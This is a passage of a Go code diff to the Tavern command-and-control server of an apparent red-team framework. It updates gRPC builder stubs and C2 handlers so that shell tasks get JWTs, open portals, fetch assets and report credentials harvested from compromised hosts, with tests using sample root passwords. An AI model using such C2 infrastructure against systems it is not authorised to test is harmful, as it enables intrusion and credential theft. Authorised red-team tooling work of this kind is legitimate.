0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x23, + 0x0a, 0x0d, 0x61, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, + 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0c, 0x61, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, 0x4e, + 0x61, 0x6d, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x03, 0x20, 0x01, + 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x38, 0x0a, 0x1b, 0x55, 0x70, 0x6c, + 0x6f, 0x61, 0x64, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x41, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, + 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x19, 0x0a, 0x08, 0x61, 0x73, 0x73, 0x65, + 0x74, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x07, 0x61, 0x73, 0x73, 0x65, + 0x74, 0x49, 0x64, 0x2a, 0x81, 0x01, 0x0a, 0x0c, 0x54, 0x61, 0x72, 0x67, 0x65, 0x74, 0x46, 0x6f, + 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1d, 0x0a, 0x19, 0x54, 0x41, 0x52, 0x47, 0x45, 0x54, 0x5f, 0x46, + 0x4f, 0x52, 0x4d, 0x41, 0x54, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, + 0x44, 0x10, 0x00, 0x12, 0x15, 0x0a, 0x11, 0x54, 0x41, 0x52, 0x47, 0x45, 0x54, 0x5f, 0x46, 0x4f, + 0x52, 0x4d, 0x41, 0x54, 0x5f, 0x42, 0x49, 0x4e, 0x10, 0x01, 0x12, 0x18, 0x0a, 0x14, 0x54, 0x41, + 0x52, 0x47, 0x45, 0x54, 0x5f, 0x46, 0x4f, 0x52, 0x4d, 0x41, 0x54, 0x5f, 0x43, 0x44, 0x59, 0x4c, + 0x49, 0x42, 0x10, 0x02, 0x12, 0x21, 0x0a, 0x1d, 0x54, 0x41, 0x52, 0x47, 0x45, 0x54, 0x5f, 0x46, + 0x4f, 0x52, 0x4d, 0x41, 0x54, 0x5f, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x57, 0x53, 0x5f, 0x53, 0x45, + 0x52, 0x56, 0x49, 0x43, 0x45, 0x10, 0x03, 0x32, 0xb3, 0x02, 0x0a, 0x07, 0x42, 0x75, 0x69, 0x6c, + 0x64, 0x65, 0x72, 0x12, 0x56, 0x0a, 0x0f, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x42, 0x75, 0x69, 0x6c, + 0x64, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x1f, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, + 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x73, + 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x20, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, + 0x72, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, + 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x6a, 0x0a, 0x15, 0x53, + 0x74, 0x72, 0x65, 0x61, 0x6d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, + 0x74, 0x70, 0x75, 0x74, 0x12, 0x25, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, 0x2e, 0x53, + 0x74, 0x72, 0x65, 0x61, 0x6d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, + 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x26, 0x2e, 0x62, 0x75, + 0x69, 0x6c, 0x64, 0x65, 0x72, 0x2e, 0x53, 0x74, 0x72, 0x65, 0x61, 0x6d, 0x42, 0x75, 0x69, 0x6c, + 0x64, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, + 0x6e, 0x73, 0x65, 0x22, 0x00, 0x28, 0x01, 0x12, 0x64, 0x0a, 0x13, 0x55, 0x70, 0x6c, 0x6f, 0x61, + 0x64, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x41, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, 0x12, 0x23, + 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, 0x2e, 0x55, 0x70, 0x6c, 0x6f, 0x61, 0x64, 0x42, + 0x75, 0x69, 0x6c, 0x64, 0x41, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, 0x52, 0x65, 0x71, 0x75, + 0x65, 0x73, 0x74, 0x1a, 0x24, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, 0x2e, 0x55, 0x70, + 0x6c, 0x6f, 0x61, 0x64, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x41, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, + 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x28, 0x01, 0x42, 0x2d, 0x5a, + 0x2b, 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, + 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x62, 0x75, 0x69, 0x6c, 0x64, + 0x65, 0x72, 0x2f, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x33, +}) var ( file_builder_proto_rawDescOnce sync.Once diff --git a/tavern/internal/builder/builderpb/builder_grpc.pb.go b/tavern/internal/builder/builderpb/builder_grpc.pb.go index 28bab3a6a..e1e3e13ca 100644 --- a/tavern/internal/builder/builderpb/builder_grpc.pb.go +++ b/tavern/internal/builder/builderpb/builder_grpc.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go-grpc. DO NOT EDIT. // versions: -// - protoc-gen-go-grpc v1.6.1 -// - protoc v4.25.1 +// - protoc-gen-go-grpc v1.3.0 +// - protoc v3.21.12 // source: builder.proto package builderpb @@ -15,8 +15,8 @@ import ( // This is a compile-time assertion to ensure that this generated file // is compatible with the grpc package it is being compiled against. -// Requires gRPC-Go v1.64.0 or later. -const _ = grpc.SupportPackageIsVersion9 +// Requires gRPC-Go v1.62.0 or later. +const _ = grpc.SupportPackageIsVersion8 const ( Builder_ClaimBuildTasks_FullMethodName = "/builder.Builder/ClaimBuildTasks" @@ -29,8 +29,8 @@ const ( // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream. type BuilderClient interface { ClaimBuildTasks(ctx context.Context, in *ClaimBuildTasksRequest, opts ...grpc.CallOption) (*ClaimBuildTasksResponse, error) - StreamBuildTaskOutput(ctx context.Context, opts ...grpc.CallOption) (grpc.ClientStreamingClient[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse], error) - UploadBuildArtifact(ctx context.Context, opts ...grpc.CallOption) (grpc.ClientStreamingClient[UploadBuildArtifactRequest, UploadBuildArtifactResponse], error) + StreamBuildTaskOutput(ctx context.Context, opts ...grpc.CallOption) (Builder_StreamBuildTaskOutputClient, error) + UploadBuildArtifact(ctx context.Context, opts ...grpc.CallOption) (Builder_UploadBuildArtifactClient, error) } type builderClient struct { @@ -51,60 +51,100 @@ func (c *builderClient) ClaimBuildTasks(ctx context.Context, in *ClaimBuildTasks return out, nil } -func (c *builderClient) StreamBuildTaskOutput(ctx context.Context, opts ...grpc.CallOption) (grpc.ClientStreamingClient[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse], error) { +func (c *builderClient) StreamBuildTaskOutput(ctx context.Context, opts ...grpc.CallOption) (Builder_StreamBuildTaskOutputClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &Builder_ServiceDesc.Streams[0], Builder_StreamBuildTaskOutput_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse]{ClientStream: stream} + x := &builderStreamBuildTaskOutputClient{ClientStream: stream} return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type Builder_StreamBuildTaskOutputClient = grpc.ClientStreamingClient[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse] +type Builder_StreamBuildTaskOutputClient interface { + Send(*StreamBuildTaskOutputRequest) error + CloseAndRecv() (*StreamBuildTaskOutputResponse, error) + grpc.ClientStream +} + +type builderStreamBuildTaskOutputClient struct { + grpc.ClientStream +} + +func (x *builderStreamBuildTaskOutputClient) Send(m *StreamBuildTaskOutputRequest) error { + return x.ClientStream.SendMsg(m) +} + +func (x *builderStreamBuildTaskOutputClient) CloseAndRecv() (*StreamBuildTaskOutputResponse, error) { + if err := x.ClientStream.CloseSend(); err != nil { + return nil, err + } + m := new(StreamBuildTaskOutputResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} -func (c *builderClient) UploadBuildArtifact(ctx context.Context, opts ...grpc.CallOption) (grpc.ClientStreamingClient[UploadBuildArtifactRequest, UploadBuildArtifactResponse], error) { +func (c *builderClient) UploadBuildArtifact(ctx context.Context, opts ...grpc.CallOption) (Builder_UploadBuildArtifactClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &Builder_ServiceDesc.Streams[1], Builder_UploadBuildArtifact_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[UploadBuildArtifactRequest, UploadBuildArtifactResponse]{ClientStream: stream} + x := &builderUploadBuildArtifactClient{ClientStream: stream} return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type Builder_UploadBuildArtifactClient = grpc.ClientStreamingClient[UploadBuildArtifactRequest, UploadBuildArtifactResponse] +type Builder_UploadBuildArtifactClient interface { + Send(*UploadBuildArtifactRequest) error + CloseAndRecv() (*UploadBuildArtifactResponse, error) + grpc.ClientStream +} + +type builderUploadBuildArtifactClient struct { + grpc.ClientStream +} + +func (x *builderUploadBuildArtifactClient) Send(m *UploadBuildArtifactRequest) error { + return x.ClientStream.SendMsg(m) +} + +func (x *builderUploadBuildArtifactClient) CloseAndRecv() (*UploadBuildArtifactResponse, error) { + if err := x.ClientStream.CloseSend(); err != nil { + return nil, err + } + m := new(UploadBuildArtifactResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} // BuilderServer is the server API for Builder service. // All implementations must embed UnimplementedBuilderServer -// for forward compatibility. +// for forward compatibility type BuilderServer interface { ClaimBuildTasks(context.Context, *ClaimBuildTasksRequest) (*ClaimBuildTasksResponse, error) - StreamBuildTaskOutput(grpc.ClientStreamingServer[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse]) error - UploadBuildArtifact(grpc.ClientStreamingServer[UploadBuildArtifactRequest, UploadBuildArtifactResponse]) error + StreamBuildTaskOutput(Builder_StreamBuildTaskOutputServer) error + UploadBuildArtifact(Builder_UploadBuildArtifactServer) error mustEmbedUnimplementedBuilderServer() } -// UnimplementedBuilderServer must be embedded to have -// forward compatible implementations. -// -// NOTE: this should be embedded by value instead of pointer to avoid a nil -// pointer dereference when methods are called. -type UnimplementedBuilderServer struct{} +// UnimplementedBuilderServer must be embedded to have forward compatible implementations. +type UnimplementedBuilderServer struct { +} func (UnimplementedBuilderServer) ClaimBuildTasks(context.Context, *ClaimBuildTasksRequest) (*ClaimBuildTasksResponse, error) { - return nil, status.Error(codes.Unimplemented, "method ClaimBuildTasks not implemented") + return nil, status.Errorf(codes.Unimplemented, "method ClaimBuildTasks not implemented") } -func (UnimplementedBuilderServer) StreamBuildTaskOutput(grpc.ClientStreamingServer[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse]) error { - return status.Error(codes.Unimplemented, "method StreamBuildTaskOutput not implemented") +func (UnimplementedBuilderServer) StreamBuildTaskOutput(Builder_StreamBuildTaskOutputServer) error { + return status.Errorf(codes.Unimplemented, "method StreamBuildTaskOutput not implemented") } -func (UnimplementedBuilderServer) UploadBuildArtifact(grpc.ClientStreamingServer[UploadBuildArtifactRequest, UploadBuildArtifactResponse]) error { - return status.Error(codes.Unimplemented, "method UploadBuildArtifact not implemented") +func (UnimplementedBuilderServer) UploadBuildArtifact(Builder_UploadBuildArtifactServer) error { + return status.Errorf(codes.Unimplemented, "method UploadBuildArtifact not implemented") } func (UnimplementedBuilderServer) mustEmbedUnimplementedBuilderServer() {} -func (UnimplementedBuilderServer) testEmbeddedByValue() {} // UnsafeBuilderServer may be embedded to opt out of forward compatibility for this service. // Use of this interface is not recommended, as added methods to BuilderServer will @@ -114,13 +154,6 @@ type UnsafeBuilderServer interface { } func RegisterBuilderServer(s grpc.ServiceRegistrar, srv BuilderServer) { - // If the following call panics, it indicates UnimplementedBuilderServer was - // embedded by pointer and is nil. This will cause panics if an - // unimplemented method is ever invoked, so we test this at initialization - // time to prevent it from happening at runtime later due to I/O. - if t, ok := srv.(interface{ testEmbeddedByValue() }); ok { - t.testEmbeddedByValue() - } s.RegisterService(&Builder_ServiceDesc, srv) } @@ -143,18 +176,56 @@ func _Builder_ClaimBuildTasks_Handler(srv interface{}, ctx context.Context, dec } func _Builder_StreamBuildTaskOutput_Handler(srv interface{}, stream grpc.ServerStream) error { - return srv.(BuilderServer).StreamBuildTaskOutput(&grpc.GenericServerStream[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse]{ServerStream: stream}) + return srv.(BuilderServer).StreamBuildTaskOutput(&builderStreamBuildTaskOutputServer{ServerStream: stream}) } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type Builder_StreamBuildTaskOutputServer = grpc.ClientStreamingServer[StreamBuildTaskOutputRequest, StreamBuildTaskOutputResponse] +type Builder_StreamBuildTaskOutputServer interface { + SendAndClose(*StreamBuildTaskOutputResponse) error + Recv() (*StreamBuildTaskOutputRequest, error) + grpc.ServerStream +} + +type builderStreamBuildTaskOutputServer struct { + grpc.ServerStream +} + +func (x *builderStreamBuildTaskOutputServer) SendAndClose(m *StreamBuildTaskOutputResponse) error { + return x.ServerStream.SendMsg(m) +} + +func (x *builderStreamBuildTaskOutputServer) Recv() (*StreamBuildTaskOutputRequest, error) { + m := new(StreamBuildTaskOutputRequest) + if err := x.ServerStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} func _Builder_UploadBuildArtifact_Handler(srv interface{}, stream grpc.ServerStream) error { - return srv.(BuilderServer).UploadBuildArtifact(&grpc.GenericServerStream[UploadBuildArtifactRequest, UploadBuildArtifactResponse]{ServerStream: stream}) + return srv.(BuilderServer).UploadBuildArtifact(&builderUploadBuildArtifactServer{ServerStream: stream}) +} + +type Builder_UploadBuildArtifactServer interface { + SendAndClose(*UploadBuildArtifactResponse) error + Recv() (*UploadBuildArtifactRequest, error) + grpc.ServerStream +} + +type builderUploadBuildArtifactServer struct { + grpc.ServerStream } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type Builder_UploadBuildArtifactServer = grpc.ClientStreamingServer[UploadBuildArtifactRequest, UploadBuildArtifactResponse] +func (x *builderUploadBuildArtifactServer) SendAndClose(m *UploadBuildArtifactResponse) error { + return x.ServerStream.SendMsg(m) +} + +func (x *builderUploadBuildArtifactServer) Recv() (*UploadBuildArtifactRequest, error) { + m := new(UploadBuildArtifactRequest) + if err := x.ServerStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} // Builder_ServiceDesc is the grpc.ServiceDesc for Builder service. // It's only intended for direct use with grpc.RegisterService, diff --git a/tavern/internal/c2/api_claim_tasks.go b/tavern/internal/c2/api_claim_tasks.go index 0dc73b9bc..b149710ea 100644 --- a/tavern/internal/c2/api_claim_tasks.go +++ b/tavern/internal/c2/api_claim_tasks.go @@ -462,12 +462,19 @@ func (srv *Server) ClaimTasks(ctx context.Context, req *c2pb.ClaimTasksRequest) return nil, rollback(tx, fmt.Errorf("failed to load shell for claimed shell task (id=%d): %w", shellTaskID, err)) } + // Generate JWT for ShellTask + shellJwtToken, err := srv.generateTaskJWT() + if err != nil { + return nil, rollback(tx, fmt.Errorf("failed to generate JWT for shell task (id=%d): %w", shellTaskID, err)) + } + resp.ShellTasks = append(resp.ShellTasks, &c2pb.ShellTask{ Id: int64(claimedShellTask.ID), Input: claimedShellTask.Input, ShellId: int64(shellID), SequenceId: claimedShellTask.SequenceID, StreamId: claimedShellTask.StreamID, + Jwt: shellJwtToken, }) } diff --git a/tavern/internal/c2/api_create_portal.go b/tavern/internal/c2/api_create_portal.go index a8e0ded92..cba8aec87 100644 --- a/tavern/internal/c2/api_create_portal.go +++ b/tavern/internal/c2/api_create_portal.go @@ -25,14 +25,29 @@ func (srv *Server) CreatePortal(gstream c2pb.C2_CreatePortalServer) error { return status.Errorf(codes.Internal, "failed to receive registration message: %v", err) } - taskID := int(registerMsg.GetContext().GetTaskId()) - if taskID <= 0 { - return status.Errorf(codes.InvalidArgument, "invalid task ID: %d", taskID) + var taskID int + var shellTaskID int + if tc := registerMsg.GetTaskContext(); tc != nil { + if err := srv.ValidateJWT(tc.GetJwt()); err != nil { + return err + } + taskID = int(tc.GetTaskId()) + } else if stc := registerMsg.GetShellTaskContext(); stc != nil { + if err := srv.ValidateJWT(stc.GetJwt()); err != nil { + return err + } + shellTaskID = int(stc.GetShellTaskId()) + } else { + return status.Errorf(codes.InvalidArgument, "missing context") + } + + if taskID <= 0 && shellTaskID <= 0 { + return status.Errorf(codes.InvalidArgument, "invalid task ID or shell task ID") } - portalID, cleanup, err := srv.portalMux.CreatePortal(ctx, srv.graph, taskID) + portalID, cleanup, err := srv.portalMux.CreatePortal(ctx, srv.graph, taskID, shellTaskID) if err != nil { - slog.ErrorContext(ctx, "failed to create portal", "task_id", taskID, "error", err) + slog.ErrorContext(ctx, "failed to create portal", "task_id", taskID, "shell_task_id", shellTaskID, "error", err) return status.Errorf(codes.Internal, "failed to create portal: %v", err) } defer cleanup() diff --git a/tavern/internal/c2/api_fetch_asset.go b/tavern/internal/c2/api_fetch_asset.go index 820aec99c..da0be3922 100644 --- a/tavern/internal/c2/api_fetch_asset.go +++ b/tavern/internal/c2/api_fetch_asset.go @@ -15,7 +15,16 @@ import ( func (srv *Server) FetchAsset(req *c2pb.FetchAssetRequest, stream c2pb.C2_FetchAssetServer) error { ctx := stream.Context() - err := srv.ValidateJWT(req.GetContext().GetJwt()) + var jwt string + if tc := req.GetTaskContext(); tc != nil { + jwt = tc.GetJwt() + } else if stc := req.GetShellTaskContext(); stc != nil { + jwt = stc.GetJwt() + } else { + return status.Errorf(codes.InvalidArgument, "missing context") + } + + err := srv.ValidateJWT(jwt) if err != nil { return err } diff --git a/tavern/internal/c2/api_fetch_asset_test.go b/tavern/internal/c2/api_fetch_asset_test.go index ea0bb24c2..8a6320078 100644 --- a/tavern/internal/c2/api_fetch_asset_test.go +++ b/tavern/internal/c2/api_fetch_asset_test.go @@ -3,11 +3,11 @@ package c2_test import ( "bytes" "context" - "crypto/rand" "errors" "fmt" "io" "testing" + "crypto/rand" _ "github.com/mattn/go-sqlite3" "github.com/stretchr/testify/assert" @@ -16,13 +16,14 @@ import ( "google.golang.org/grpc/status" "realm.pub/tavern/internal/c2/c2pb" "realm.pub/tavern/internal/c2/c2test" + "realm.pub/tavern/internal/ent" ) func TestFetchAsset(t *testing.T) { // Setup Dependencies - ctx := context.Background() client, graph, close, token := c2test.New(t) defer close() + ctx := context.Background() // Test Cases type testCase struct { @@ -50,65 +51,84 @@ func TestFetchAsset(t *testing.T) { { name: "File Not Found", fileName: "n/a", + fileSize: 0, req: &c2pb.FetchAssetRequest{Name: "this_file_does_not_exist"}, wantCode: codes.NotFound, }, } testHandler := func(t *testing.T, tc testCase) { - // Generate Random Content - data := make([]byte, tc.fileSize) - _, err := rand.Read(data) - require.NoError(t, err) - // Create Asset - a := graph.Asset.Create(). - SetName(tc.fileName). - SetContent(data). - SaveX(ctx) + var a *ent.Asset + if tc.fileSize > 0 { + // Generate Random Content + data := make([]byte, tc.fileSize) + _, err := rand.Read(data) + require.NoError(t, err) + + a = graph.Asset.Create(). + SetName(tc.fileName). + SetContent(data). + SaveX(ctx) + } // Ensure request contains JWT if tc.req.Context == nil { - tc.req.Context = &c2pb.TaskContext{Jwt: token} + tc.req.Context = &c2pb.FetchAssetRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{Jwt: token}, + } } else { - tc.req.Context.Jwt = token + switch c := tc.req.Context.(type) { + case *c2pb.FetchAssetRequest_TaskContext: + c.TaskContext.Jwt = token + case *c2pb.FetchAssetRequest_ShellTaskContext: + c.ShellTaskContext.Jwt = token + } } // Send Request - fileClient, err := client.FetchAsset(ctx, tc.req) + stream, err := client.FetchAsset(ctx, tc.req) require.NoError(t, err) // Read All Chunks var buf bytes.Buffer for { // Receive Chunk - resp, err := fileClient.Recv() + resp, err := stream.Recv() if errors.Is(err, io.EOF) { break } - // Check Status - require.Equal(t, tc.wantCode.String(), status.Code(err).String()) - if status.Code(err) != codes.OK { - // Do not continue if we expected error code - return - } + if err != nil { + st, ok := status.FromError(err) + require.True(t, ok) + // Check Status + require.Equal(t, tc.wantCode.String(), st.Code().String()) + if st.Code() != codes.OK { + // Do not continue if we expected error code + return + } + } // Write Chunk - _, err = buf.Write(resp.Chunk) - require.NoError(t, err) + if resp != nil { + _, err = buf.Write(resp.Chunk) + require.NoError(t, err) + } } // Assert Content - assert.Equal(t, a.Content, buf.Bytes()) + if a != nil { + assert.Equal(t, a.Content, buf.Bytes()) - // Assert Headers - metadata, err := fileClient.Header() - require.NoError(t, err) - require.Len(t, metadata.Get("sha3-256-checksum"), 1) - assert.Equal(t, a.Hash, metadata.Get("sha3-256-checksum")[0]) - require.Len(t, metadata.Get("file-size"), 1) - assert.Equal(t, fmt.Sprintf("%d", a.Size), metadata.Get("file-size")[0]) + // Assert Headers + metadata, err := stream.Header() + require.NoError(t, err) + require.Len(t, metadata.Get("sha3-256-checksum"), 1) + assert.Equal(t, a.Hash, metadata.Get("sha3-256-checksum")[0]) + require.Len(t, metadata.Get("file-size"), 1) + assert.Equal(t, fmt.Sprintf("%d", a.Size), metadata.Get("file-size")[0]) + } } // Run Tests diff --git a/tavern/internal/c2/api_report_credential.go b/tavern/internal/c2/api_report_credential.go index 4d58a09c9..064c3ebb9 100644 --- a/tavern/internal/c2/api_report_credential.go +++ b/tavern/internal/c2/api_report_credential.go @@ -10,42 +10,62 @@ import ( ) func (srv *Server) ReportCredential(ctx context.Context, req *c2pb.ReportCredentialRequest) (*c2pb.ReportCredentialResponse, error) { - // Validate Arguments - if req.GetContext().GetTaskId() == 0 { - return nil, status.Errorf(codes.InvalidArgument, "must provide task id") - } if req.Credential == nil { return nil, status.Errorf(codes.InvalidArgument, "must provide credential") } - err := srv.ValidateJWT(req.GetContext().GetJwt()) - if err != nil { - return nil, err - } - // Load Task - task, err := srv.graph.Task.Get(ctx, int(req.GetContext().GetTaskId())) - if ent.IsNotFound(err) { - return nil, status.Errorf(codes.NotFound, "no task found") - } - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to load task") - } + var host *ent.Host + var task *ent.Task + var shellTask *ent.ShellTask - // Load Host - host, err := task.QueryBeacon().QueryHost().Only(ctx) - if err != nil { - return nil, status.Errorf(codes.Internal, "failed to load host") + if tc := req.GetTaskContext(); tc != nil { + if err := srv.ValidateJWT(tc.GetJwt()); err != nil { + return nil, err + } + t, err := srv.graph.Task.Get(ctx, int(tc.GetTaskId())) + if err != nil { + return nil, status.Errorf(codes.NotFound, "task not found: %v", err) + } + task = t + h, err := t.QueryBeacon().QueryHost().Only(ctx) + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to load host from task: %v", err) + } + host = h + } else if stc := req.GetShellTaskContext(); stc != nil { + if err := srv.ValidateJWT(stc.GetJwt()); err != nil { + return nil, err + } + st, err := srv.graph.ShellTask.Get(ctx, int(stc.GetShellTaskId())) + if err != nil { + return nil, status.Errorf(codes.NotFound, "shell task not found: %v", err) + } + shellTask = st + h, err := st.QueryShell().QueryBeacon().QueryHost().Only(ctx) + if err != nil { + return nil, status.Errorf(codes.Internal, "failed to load host from shell task: %v", err) + } + host = h + } else { + return nil, status.Errorf(codes.InvalidArgument, "missing context") } // Create Credential - if _, err := srv.graph.HostCredential.Create(). + builder := srv.graph.HostCredential.Create(). SetHost(host). - SetTask(task). SetPrincipal(req.Credential.Principal). SetSecret(req.Credential.Secret). - SetKind(req.Credential.Kind). - Save(ctx); err != nil { - return nil, status.Errorf(codes.Internal, "failed to save credential") + SetKind(req.Credential.Kind) + + if task != nil { + builder.SetTask(task) + } + if shellTask != nil { + builder.SetShellTask(shellTask) + } + + if _, err := builder.Save(ctx); err != nil { + return nil, status.Errorf(codes.Internal, "failed to save credential: %v", err) } return &c2pb.ReportCredentialResponse{}, nil diff --git a/tavern/internal/c2/api_report_credential_test.go b/tavern/internal/c2/api_report_credential_test.go index 9501f0525..9ad9bfe96 100644 --- a/tavern/internal/c2/api_report_credential_test.go +++ b/tavern/internal/c2/api_report_credential_test.go @@ -19,9 +19,9 @@ import ( func TestReportCredential(t *testing.T) { // Setup Dependencies - ctx := context.Background() client, graph, close, token := c2test.New(t) defer close() + ctx := context.Background() // Test Data existingBeacon := c2test.NewRandomBeacon(ctx, graph) @@ -51,11 +51,13 @@ func TestReportCredential(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportCredentialRequest{ - Context: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + Context: &c2pb.ReportCredentialRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + }, Credential: &epb.Credential{ Principal: existingCredential.Principal, Secret: existingCredential.Secret, - Kind: existingCredential.Kind, + Kind: epb.Credential_KIND_PASSWORD, }, }, wantResp: &c2pb.ReportCredentialResponse{}, @@ -64,12 +66,12 @@ func TestReportCredential(t *testing.T) { { Principal: existingCredential.Principal, Secret: existingCredential.Secret, - Kind: existingCredential.Kind, + Kind: epb.Credential_KIND_PASSWORD, }, { Principal: existingCredential.Principal, Secret: existingCredential.Secret, - Kind: existingCredential.Kind, + Kind: epb.Credential_KIND_PASSWORD, }, }, }, @@ -78,7 +80,9 @@ func TestReportCredential(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportCredentialRequest{ - Context: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + Context: &c2pb.ReportCredentialRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + }, Credential: &epb.Credential{ Principal: "root", Secret: "changeme123", @@ -91,17 +95,17 @@ func TestReportCredential(t *testing.T) { { Principal: existingCredential.Principal, Secret: existingCredential.Secret, - Kind: existingCredential.Kind, + Kind: epb.Credential_KIND_PASSWORD, }, { Principal: existingCredential.Principal, Secret: existingCredential.Secret, - Kind: existingCredential.Kind, + Kind: epb.Credential_KIND_PASSWORD, }, { Principal: "root", Secret: "changeme123", - Kind: existingCredential.Kind, + Kind: epb.Credential_KIND_PASSWORD, }, }, }, @@ -125,7 +129,9 @@ func TestReportCredential(t *testing.T) { host: existingHost, task: existingTask, req: &c2pb.ReportCredentialRequest{ - Context: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + Context: &c2pb.ReportCredentialRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: int64(existingTask.ID), Jwt: token}, + }, }, wantResp: nil, wantCode: codes.InvalidArgument, @@ -133,7 +139,9 @@ func TestReportCredential(t *testing.T) { { name: "NotFound", req: &c2pb.ReportCredentialRequest{ - Context: &c2pb.TaskContext{TaskId: 99888777776666, Jwt: token}, + Context: &c2pb.ReportCredentialRequest_TaskContext{ + TaskContext: &c2pb.TaskContext{TaskId: 99888777776666, Jwt: token}, + }, Credential: &epb.Credential{ Principal: "root", Secret: "oopsies", @@ -151,8 +159,9 @@ func TestReportCredential(t *testing.T) { resp, err := client.ReportCredential(ctx, tc.req) // Assert Response Code - require.Equal(t, tc.wantCode.String(), status.Code(err).String(), err) - if status.Code(err) != codes.OK { + st, _ := status.FromError(err) + require.Equal(t, tc.wantCode.String(), st.Code().String(), err) + if st.Code() != codes.OK { // Do not continue if we expected error code return } @@ -163,28 +172,30 @@ func TestReportCredential(t *testing.T) { } // Reload Host - host := graph.Host.GetX(ctx, tc.host.ID) + if tc.host != nil { + host := graph.Host.GetX(ctx, 